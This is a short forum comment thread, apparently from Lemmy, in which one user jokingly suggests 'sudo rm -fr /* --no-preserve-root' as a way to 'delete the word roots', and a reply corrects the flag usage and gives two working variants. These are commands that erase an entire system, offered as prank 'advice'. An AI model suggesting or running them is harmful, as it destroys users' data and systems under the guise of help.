• da_cow (she/her)
    link
    fedilink
    87 months ago

    Make sure to also completely delete the word roots.

    sudo rm -fr /* --no-preserve-root

    • @coldsideofyourpillow@lemmy.cafe
      link
      fedilink
      English
      26 months ago

      You only need the --no-preserve-root flag when acting on /.

      So the correct code would be either sudo rm -fr /* or sudo rm -fr / --no-preserve-root(more appropriate for your ‘advice’)